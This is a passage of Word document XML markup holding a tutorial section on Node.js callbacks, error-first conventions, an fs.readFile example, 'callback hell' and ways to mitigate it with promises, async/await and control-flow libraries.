          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Asynchronous Execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AA8A63" w14:textId="77777777" w:rsidR="00BC18A1" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC18A1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="644"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Node.js is non-blocking and uses callbacks to handle tasks that take time to complete, such as I/O operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368BF313" w14:textId="77777777" w:rsidR="00BC18A1" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC18A1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="644"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>When an asynchronous function is called, Node.js can continue executing the rest of the code while waiting for the callback to execute once the task is done.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F8E42A" w14:textId="77777777" w:rsidR="00BC18A1" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC18A1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="644"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Callback Function</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3455E4F1" w14:textId="77777777" w:rsidR="00BC18A1" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC18A1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="644"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>A callback function is passed as an argument to another function and is invoked when the asynchronous operation completes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3CC88A" w14:textId="77777777" w:rsidR="00BC18A1" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC18A1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="644"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Error-First Callbacks</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE651EA" w14:textId="77777777" w:rsidR="00BC18A1" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC18A1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="644"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In Node.js, callbacks often follow an "error-first" convention. The first argument of the callback is typically reserved for an error object (or null if there’s no error), and the subsequent arguments contain the result of the operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE15A8C" w14:textId="77777777" w:rsidR="00BC18A1" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC18A1" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example: Using a Callback in Node.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025B6CDA" w14:textId="77777777" w:rsidR="00BC18A1" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC18A1" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Suppose you want to read a file asynchronously using Node.js. The fs.readFile method takes a callback function that gets called once the file has been read.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086B9F52" w14:textId="77777777" w:rsidR="00BC18A1" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC18A1" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCF29DA"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fs = require('fs');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62857D24"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61EAC1D"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Reading a file asynchronously</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BDACCD"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fs.readFile('example.txt', 'utf8', (err, data) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749B0D43"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(err) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B58A68B"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Handle the error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FA0F38"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console.error('Error reading file:', err);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E26A067"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE446B7"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279B645"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02523C1A"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Process the file content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D86C6A"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console.log('File content:', data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C3F67A"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5CD37A3D"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80560C9"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console.log('This message is logged before the file is read.');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415EC4B4" w14:textId="77777777" w:rsidR="00BC18A1" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC18A1" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAD0461" w14:textId="77777777" w:rsidR="00BC18A1" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC18A1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="645"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>fs.readFile</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: This is an asynchronous function that reads the contents of a file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678DF905" w14:textId="77777777" w:rsidR="00BC18A1" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC18A1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="645"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Callback Function</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: (err, data) is the callback function passed to fs.readFile. It gets executed after the file is read:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C97115A" w14:textId="77777777" w:rsidR="00BC18A1" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC18A1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="645"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>err: The first parameter represents an error, if any occurred.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A81900C" w14:textId="77777777" w:rsidR="00BC18A1" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC18A1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="645"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>data: The second parameter contains the file content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377FFAD8" w14:textId="77777777" w:rsidR="00BC18A1" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC18A1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="645"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Non-blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The console.log('This message is logged before the file is read.') statement is executed immediately, without waiting for the file reading operation to complete, demonstrating the non-blocking nature of Node.js.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C70C2E" w14:textId="77777777" w:rsidR="00BC18A1" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC18A1" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Nested Callbacks and "Callback Hell"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462B2723" w14:textId="77777777" w:rsidR="00BC18A1" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC18A1" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>When multiple asynchronous operations depend on each other, you might end up with nested callbacks, which can make the code difficult to read and maintain. This situation is often referred to as "callback hell."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00894F2C" w14:textId="77777777" w:rsidR="00BC18A1" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC18A1" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example of Callback Hell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE1184D"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fs.readFile('file1.txt', 'utf8', (err, data1) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586E39F8"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(err) return console.error(err);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B2C839"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0B7E01D"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fs.readFile('file2.txt', 'utf8', (err, data2) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691D9538"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(err) return console.error(err);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF279A2"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27311219"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fs.readFile('file3.txt', 'utf8', (err, data3) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208FFF2F"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(err) return console.error(err);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3D6718"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1A8E654"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Continue processing with data1, data2, data3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4798D97D"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console.log(data1, data2, data3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDC7A5C"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E4EFA95"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6EFF3D4" w14:textId="77777777" w:rsidR="00BC18A1" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC18A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4E69F3B7" w14:textId="77777777" w:rsidR="00BC18A1" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC18A1" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Mitigating Callback Hell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B79C4E" w14:textId="77777777" w:rsidR="00BC18A1" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC18A1" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>To mitigate callback hell, you can use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF43A99" w14:textId="77777777" w:rsidR="00BC18A1" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC18A1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="646"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Modularize Code</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Break down the code into smaller functions that can be reused.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3378C664" w14:textId="77777777" w:rsidR="00BC18A1" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC18A1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="646"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Promises</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use promises to handle asynchronous operations more elegantly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5FB6C1" w14:textId="77777777" w:rsidR="00BC18A1" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC18A1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="646"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Async/Await</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Utilize async/await syntax introduced in ES2017 to write asynchronous code that looks synchronous.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F2EE71" w14:textId="77777777" w:rsidR="00BC18A1" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC18A1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="646"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Control Flow Libraries</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use libraries like async.js to manage asynchronous control flow in Node.js.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB24735" w14:textId="77777777" w:rsidR="00BC18A1" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC18A1" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35629425" w14:textId="77777777" w:rsidR="00BC18A1" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC18A1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="647"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Callbacks</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> are functions passed as arguments to be executed once an asynchronous operation is complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DA2BC1" w14:textId="77777777" w:rsidR="00BC18A1" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC18A1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="647"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
